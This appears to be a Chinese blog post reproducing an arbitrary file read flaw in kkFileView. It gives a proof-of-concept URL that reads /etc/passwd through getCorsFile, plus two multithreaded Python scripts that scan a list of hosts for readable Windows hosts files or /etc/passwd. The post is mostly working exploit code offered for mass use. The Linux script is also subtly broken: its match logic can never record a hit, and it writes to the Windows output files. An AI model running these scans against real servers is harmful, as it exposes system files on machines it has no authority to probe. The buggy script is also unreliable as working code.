kkFileView任意文件读取漏洞复现
POC
/getCorsFile?urlPath=file:///etc/passwd
https://preview.test.com/getCorsFile?urlPath=file:///etc/passwd
1.读取Windows的hosts文件脚本
import requests
from concurrent.futures import ThreadPoolExecutor
from tqdm import tqdm
# 从文件中读取目标网址
with open("llliii.txt", "r") as file:
urls = file.read().splitlines()
# 访问函数
def check_url(url):
try:
response = requests.get(f"{url}/getCorsFile?urlPath=file://C:\Windows\System32\drivers\etc\hosts", verify=False, timeout=5)
if "localhost" in response.text:
return url, "localhost"
else:
return url, "no localhost"
except Exception as e:
return url, str(e)
# 多线程访问网址
results = []
with ThreadPoolExecutor(max_workers=200) as executor:
futures = [executor.submit(check_url, url) for url in urls]
for future in tqdm(futures, total=len(urls), desc="Checking URLs"):
results.append(future.result())
# 写入结果到文件
with open("win-ok.txt", "w") as ok_file, open("win-fault.txt", "w") as fault_file:
for url, result in results:
if result == "localhost":
ok_file.write(f"{url}\n")
else:
fault_file.write(f"{url}: {result}\n")
2.读取Linux的/etc/passwd文件
import requests
from concurrent.futures import ThreadPoolExecutor
from tqdm import tqdm
# 从文件中读取目标网址
with open("llliii.txt", "r") as file:
urls = file.read().splitlines()
# 访问函数
def check_url(url):
try:
response = requests.get(f"{url}/getCorsFile?urlPath=file:///etc/passwd", verify=False, timeout=5)
if "localhost" in response.text:
return url, "root"
else:
return url, "no root"
except Exception as e:
return url, str(e)
# 多线程访问网址
results = []
with ThreadPoolExecutor(max_workers=200) as executor:
futures = [executor.submit(check_url, url) for url in urls]
for future in tqdm(futures, total=len(urls), desc="Checking URLs"):
results.append(future.result())
# 写入结果到文件
with open("win-ok.txt", "w") as ok_file, open("win-fault.txt", "w") as fault_file:
for url, result in results:
if result == "localhost":
ok_file.write(f"{url}\n")
else:
fault_file.write(f"{url}: {result}\n")
-.-
评论区